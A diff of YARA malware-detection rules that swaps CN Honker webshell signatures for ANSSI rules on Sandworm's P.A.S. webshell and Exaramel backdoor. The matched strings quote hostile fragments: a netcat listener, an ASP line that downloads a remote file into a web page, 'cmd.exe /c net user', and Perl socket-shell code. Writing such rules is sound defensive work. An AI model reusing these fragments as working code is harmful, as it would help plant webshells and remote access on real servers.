+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L30-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b9b2107c946431e4ad1a8f5e53ac05e132935c0e"
-		logic_hash = "f138a82c2d6a831626fe200308eb89cb50ffeec2f2722599eb4ccbd082bad73d"
-		score = 70
+		logic_hash = "c15e7022f45ec211ba635d6cd31bab16f4fb0d3038fb19d5765e0f751c14a826"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
-		$s2 = "<form action=\"<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>\" method=\"post\">" fullword ascii
+		$s1 = "Archive created by P.A.S. v."
 
 	condition:
-		filesize < 4KB and all of them
+		$s1
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php4 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Perlnetworkscript : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php4.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "82446dff-dd1e-54a8-bb70-570bedc805b5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L961-L975"
+		description = "Detects PERL scripts created by P.A.S. webshell"
+		author = "FR/ANSSI/SDO"
+		id = "1625b63f-ead7-5712-92b4-0ce6ecc49fd4"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L44-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "179975f632baff6ee4d674fe3fabc324724fee9e"
-		logic_hash = "e625b6d1fd2c1e62306ccae2775ee7b53ddcdd7a6baef55b386dfcd92dc2e764"
-		score = 70
+		logic_hash = "b170c07a005e737c8069f2cc63f869d4d3ff6593b3bfca5bcaf02d7808da6852"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "nc -l -vv -p port(" ascii
+		$pl_start = "#!/usr/bin/perl\n$SIG{'CHLD'}='IGNORE'; use IO::Socket; use FileHandle;"
+		$pl_status = "$o=\" [OK]\";$e=\" Error: \""
+		$pl_socket = "socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print \"$l$e$!$l"
+		$msg1 = "print \"$l OK! I\\'m successful connected.$l\""
+		$msg2 = "print \"$l OK! I\\'m accept connection.$l\""
 
 	condition:
-		uint16( 0 ) == 0x4850 and filesize < 1KB and all of them
+		filesize < 6000 and ( $pl_start at 0 and all of ( $pl* ) ) or any of ( $msg* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Linux_2_6_Exploit : FILE
+rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Sqldumpfile
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file 2.6.9"
-		author = "Florian Roth (Nextron Systems)"
-		id = "22e2aca7-418f-598f-af0c-99942aaf3278"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L977-L991"
+		description = "Detects SQL dump file created by P.A.S. webshell"
+		author = "FR/ANSSI/SDO"
+		id = "4c26feeb-3031-5c91-9eeb-4b5fe9702e39"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L64-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ec22fac0510d0dc2c29d56c55ff7135239b0aeee"
-		logic_hash = "7f3e2937796358a949ce980210ddeb1a606a7b9c2b4d9c4a4acad49bb556dfc8"
-		score = 70
+		logic_hash = "c34abcada22fdf462fd66cc2da18ab9e54215defc6f7a7a95b5a80d1155a2ffe"
+		score = 90
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "[+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?" fullword ascii
+		$ = "-- [ SQL Dump created by P.A.S. ] --"
 
 	condition:
-		filesize < 56KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp2 : FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_Key
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp2.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5296405-c345-55dc-acd9-be6aca86c60b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L993-L1009"
+		description = "Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...]"
+		author = "FR/ANSSI/SDO"
+		id = "8078de62-3dd2-5ee0-8bda-f508e4013144"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L78-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b3ac478e72a0457798a3532f6799adeaf4a7fc87"
-		logic_hash = "6107afe9895c4e0c865e78bece160246815a0d3c589bfc79f8b369b94481cd89"
-		score = 70
+		logic_hash = "056503a2c240a641cd2292a30ab1090e3a358cb4d57dca83b836ecb1bc62ed6b"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "<%=server.mappath(request.servervariables(\"script_name\"))%>" fullword ascii
-		$s2 = "webshell</font> <font color=#00FF00>" fullword ascii
-		$s3 = "Userpwd = \"admin\"   'User Password" fullword ascii
+		$ = "odhyrfjcnfkdtslt"
 
 	condition:
-		filesize < 10KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_FTP_MYSQL_MSSQL_SSH : FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_Name_Encrypted
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file FTP MYSQL MSSQL SSH.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dd619901-6f0e-527e-9926-808176641c09"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1011-L1029"
+		description = "Detects the specific name of the configuration file in Exaramel malware as seen in sample e1ff72[...]"
+		author = "FR/ANSSI/SDO"
+		id = "1c06f5fc-3435-51cd-92fb-17a4ab6b63ad"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L92-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fe63b215473584564ef2e08651c77f764999e8ac"
-		logic_hash = "a66884c71ce0cce05ba6607bf66dc55bfae5393746328c06f5c9ca98005d0caf"
-		score = 70
+		logic_hash = "f65d59381403534a2c2f39d66c7c62bf1540eafc9aad1ad73de1809e91c42446"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "$_SESSION['hostlist'] = $hostlist = $_POST['hostlist'];" fullword ascii
-		$s2 = "Codz by <a href=\"http://www.sablog.net/blog\">4ngel</a><br />" fullword ascii
-		$s3 = "if ($conn_id = @ftp_connect($host, $ftpport)) {" fullword ascii
-		$s4 = "$_SESSION['sshport'] = $mssqlport = $_POST['sshport'];" fullword ascii
-		$s5 = "<title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel</title>" fullword ascii
+		$ = "configtx.json"
 
 	condition:
-		filesize < 20KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Shell : FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_File_Plaintext
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file shell.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fdfc3fc1-9400-533b-978b-1a1fac112e1f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1031-L1047"
+		description = "Detects contents of the configuration file used by Exaramel (plaintext)"
+		author = "FR/ANSSI/SDO"
+		id = "6f0d834b-e6c8-59e6-bf9a-b4fd9c0b2297"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L106-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b7b34215c2293ace70fc06cbb9ce73743e867289"
-		logic_hash = "be3961d6568acfaadfa09efda2f914259a59f4e30725c7d434e89f6020e40515"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "536327d5216372a3fd2f4dad0a21be2778ce2930212daf0a8628ecbdab49b46e"
+		score = 80
+		quality = 60
+		tags = ""
 
 	strings:
-		$s1 = "xPost.Open \"GET\",\"http://www.i0day.com/1.txt\",False //" fullword ascii
-		$s2 = "sGet.SaveToFile Server.MapPath(\"test.asp\"),2 //" fullword ascii
-		$s3 = "http://hi.baidu.com/xahacker/fuck.txt" fullword ascii
+		$ = /\{"Hosts":\[".{10,512}"\],"Proxy":".{0,512}","Version":".{1,32}","Guid":"/
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php7 : FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_File_Ciphertext
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php7.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f21bb0db-d18a-58c0-a227-5baf5536c57b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1049-L1064"
+		description = "Detects contents of the configuration file used by Exaramel (encrypted with key odhyrfjcnfkdtslt, sample e1ff72[...]"
+		author = "FR/ANSSI/SDO"
+		id = "763dbb17-2bad-5b40-8a7b-b71bc5849cd9"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L120-L132"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "05a3f93dbb6c3705fd5151b6ffb64b53bc555575"
-		logic_hash = "70804d914c6f31422632943bf663f997eb747a290a13b27bfcc66bc3129f136d"
-		score = 70
+		logic_hash = "9dc7ee5b0a218a2b5be652e137fa090c944c3ddb0f699f521a72896668210813"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "---> '.$ports[$i].'<br>'; ob_flush(); flush(); } } echo '</div>'; return true; }" ascii
-		$s1 = "$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : ''; $getaction = iss" ascii
+		$ = { 6F B6 08 E9 A3 0C 8D 5E DD BE D4 }
 
 	condition:
-		filesize < 300KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Rootkit : FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Socket_Path
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file rootkit.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ab51abca-0790-541c-9f18-1568809ef113"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1066-L1081"
+		description = "Detects path of the unix socket created to prevent concurrent executions in Exaramel malware"
+		author = "FR/ANSSI/SDO"
+		id = "3aab84c9-9748-5d11-9cd7-efa9151036cf"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L134-L146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3bfc1c95782e702cf56184e7d438edcf5802eab3"
-		logic_hash = "5569a179f011ece9802676542d5556fe8d2a2b144e26065b9e0c5bd06c970201"
-		score = 70
+		logic_hash = "8c049b5a7b508ca0f160d166f3c726e4a23a2c5b3105d075d7bf7a301a1c58f6"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "set ss=zsckm.get(\"Win32_ProcessSta\"&uyy&\"rtup\")" fullword ascii
-		$s1 = "If jzgm=\"\"Then jzgm=\"cmd.exe /c net user\"" fullword ascii
+		$ = "/tmp/.applocktx"
 
 	condition:
-		filesize < 80KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Jspshell : FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Task_Names
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jspshell.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ff72f94b-1c0a-5615-b35f-35f69c920292"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1083-L1098"
+		description = "Detects names of the tasks received from the CC server in Exaramel malware"
+		author = "FR/ANSSI/SDO"
+		id = "185f2f3b-bf5c-54af-bca2-400d08bf9c91"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L148-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d16af622f7688d4e0856a2678c4064d3d120e14b"
-		logic_hash = "9b952f941eb87d7a1b4f747f4e0b0b5ee8876190c6f684b811057a2c78044047"
-		score = 70
+		logic_hash = "193482da1e2b9509fa9c65d46edc56057f7b5d44b7408d918d4a9cbb60736dab"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "else if(Z.equals(\"M\")){String[] c={z1.substring(2),z1.substring(0,2),z2};Proce" ascii
-		$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
+		$ = "App.Delete"
+		$ = "App.SetServer"
+		$ = "App.SetProxy"
+		$ = "App.SetTimeout"
+		$ = "App.Update"
+		$ = "IO.ReadFile"
+		$ = "IO.WriteFile"
+		$ = "OS.ShellExecute"
 
 	condition:
-		filesize < 30KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Serv_U : FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Struct
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file serv-u.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dd37b2c3-e06d-5245-97d7-40e5eeadb76f"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1100-L1117"
+		description = "Detects the beginning of type _type struct for some of the most important structs in Exaramel malware"
+		author = "FR/ANSSI/SDO"
+		id = "8282e485-966c-554d-8e41-70dc1657f5ea"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L169-L185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1c6415a247c08a63e3359b06575b36017befc0c0"
-		logic_hash = "89cfcbaa38c3b0b6c31af634b4588dcc8bc7a5aa3edac955a162173341d03622"
-		score = 70
+		logic_hash = "312d0598fa85837f94023036468fcae50e8b2de532430a944befa8090afe79f6"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "@readfile(\"c:\\\\winnt\\\\system32\\" ascii
-		$s2 = "$sendbuf = \"PASS \".$_POST[\"password\"].\"\\r\\n\";" fullword ascii
-		$s3 = "$cmd=\"cmd /c rundll32.exe $path,install $openPort $activeStr\";" fullword ascii
+		$struct_le_config = {70 00 00 00 00 00 00 00 58 00 00 00 00 00 00 00 47 2d 28 42 0? [2] 19}
+		$struct_le_worker = {30 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 46 6a 13 e2 0? [2] 19}
+		$struct_le_client = {20 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 7b 6a 49 84 0? [2] 19}
+		$struct_le_report = {30 00 00 00 00 00 00 00 28 00 00 00 00 00 00 00 bf 35 0d f9 0? [2] 19}
+		$struct_le_task = {50 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 88 60 a1 c5 0? [2] 19}
 
 	condition:
-		filesize < 435KB and all of them
+		any of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Webshell : FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Strings_Typo
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file WebShell.cgi"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9fe4c8fd-3955-5405-add2-835e6f64e8f2"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1119-L1135"
+		description = "Detects misc strings in Exaramel malware with typos"
+		author = "FR/ANSSI/SDO"
+		id = "fdc79b87-eb9e-5751-9474-ff653b073165"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L187-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
-		logic_hash = "7d80390a86b1858d2cf4f2be56df7e734aea402de0878adf40ef36721719ca74"
-		score = 70
+		logic_hash = "65e6de743eb9fc742674c7e54eef8a376963a6fd4380bacd03fe6f92d4235920"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "$login = crypt($WebShell::Configuration::password, $salt);" fullword ascii
-		$s2 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword ascii
-		$s3 = "warn \"command: '$command'\\n\";" fullword ascii
+		$typo1 = "/sbin/init | awk "
+		$typo2 = "Syslog service for monitoring \n"
+		$typo3 = "Error.Can't update app! Not enough update archive."
+		$typo4 = ":\"metod\""
 
 	condition:
-		filesize < 30KB and 2 of them
+		3 of ( $typo* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Mssql_2 : FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Strings
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file mssql.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3f9706d6-7f6e-5120-945a-d5d928d79507"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1137-L1153"
+		description = "Detects Strings used by Exaramel malware"
+		author = "FR/ANSSI/SDO (composed from 4 saparate rules by Florian Roth)"
+		id = "fdc79b87-eb9e-5751-9474-ff653b073165"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L204-L232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ad55512afa109b205e4b1b7968a89df0cf781dc9"
-		logic_hash = "1d4b75eeeddda6e92b8ec38679d5e2b9d21abf2d2b467b91a066dcf628725f0a"
-		score = 70
+		logic_hash = "9d2790e60184ed973b2735263d0a997f32af0beacc9ea8ef65926fe6507011d5"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "sqlpass=request(\"sqlpass\")" fullword ascii
-		$s2 = "set file=fso.createtextfile(server.mappath(request(\"filename\")),8,true)" fullword ascii
-		$s3 = "<blockquote> ServerIP:&nbsp;&nbsp;&nbsp;" fullword ascii
+		$persistence1 = "systemd"
+		$persistence2 = "upstart"
+		$persistence3 = "systemV"
+		$persistence4 = "freebsd rc"
+		$report1 = "systemdupdate.rep"
+		$report2 = "upstartupdate.rep"
+		$report3 = "remove.rep"
+		$url1 = "/tasks.get/"
+		$url2 = "/time.get/"
+		$url3 = "/time.set"
+		$url4 = "/tasks.report"
+		$url5 = "/attachment.get/"
+		$url6 = "/auth/app"
 
 	condition:
-		filesize < 3KB and all of them
+		(5 of ( $url* ) and all of ( $persistence* ) ) or ( all of ( $persistence* ) and all of ( $report* ) ) or ( 5 of ( $url* ) and all of ( $report* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp1 : FILE
+rule SIGNATURE_BASE_Custom_Ssh_Backdoor_Server
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp1.txt"
+		description = "Custome SSH backdoor based on python and paramiko - file server.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf0b1f1e-cf7b-5afb-8e0a-bcfd70fc8887"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1155-L1171"
+		id = "eccf705b-b2c3-5af6-ab86-70292089812b"
+		date = "2015-05-14"
+		modified = "2022-08-18"
+		reference = "https://goo.gl/S46L3o"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_backdoor_ssh_python.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "78b5889b363043ed8a60bed939744b4b19503552"
-		logic_hash = "3b454b1254d05b2208aee02e966c9c56a338dd3d33a2c6acc2c4df3208314055"
-		score = 70
+		hash = "0953b6c2181249b94282ca5736471f85d80d41c9"
+		logic_hash = "7bb142b69a75003e8f26d462c0895a3d807d5c326684e83d756178a3b91669dc"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "SItEuRl=" ascii
-		$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
-		$s3 = "Server.ScriptTimeout=" ascii
+		$s0 = "command= raw_input(\"Enter command: \").strip('n')" fullword ascii
+		$s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii
+		$s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii
 
 	condition:
-		filesize < 200KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Sedll_Javascript_Decryptor : FILE
+rule SIGNATURE_BASE_Derusbi_Kernel : FILE
 {
 	meta:
-		description = "Detects SeDll - DLL is used for decrypting and executing another JavaScript backdoor such as Orz"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8fafd139-0c4f-5c51-af8f-b4917d2d69b0"
-		date = "2017-10-18"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_leviathan.yar#L11-L31"
+		description = "Derusbi Driver version"
+		author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
+		id = "a60ab93a-e2be-53ee-a7da-56c763bc5533"
+		date = "2015-12-09"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L9-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "26ef61d8bb1764dddd951526902fb510fbacc8b808fe99ddee1956dc8b59bd1d"
+		logic_hash = "d5a0ce0b0116c3a84d52c22369dbf3cb9cf3ad8f8a05cea5565ba9bb99255fab"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "146aa9a0ec013aa5bdba9ea9d29f59d48d43bc17c6a20b74bb8c521dbb5bc6f4"
 
 	strings:
-		$x1 = "SEDll_Win32.dll" fullword ascii
-		$x2 = "regsvr32 /s \"%s\" DR __CIM__" wide
-		$s1 = "WScriptW" fullword ascii
-		$s2 = "IWScript" fullword ascii
-		$s3 = "%s\\%s~%d" fullword wide
-		$s4 = "PutBlockToFileWW" fullword ascii
-		$s5 = "CheckUpAndDownWW" fullword ascii
+		$token1 = "$$$--Hello"
+		$token2 = "Wrod--$$$"
+		$class = ".?AVPCC_BASEMOD@@"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) or 4 of them )
+		uint16( 0 ) == 0x5A4D and $token1 and $token2 and $class
 }
-rule SIGNATURE_BASE_Leviathan_Cobaltstrike_Sample_1 : FILE
+rule SIGNATURE_BASE_Derusbi_Linux : FILE
 {
 	meta:
-		description = "Detects Cobalt Strike sample from Leviathan report"
-		author = "Florian Roth (Nextron Systems)"
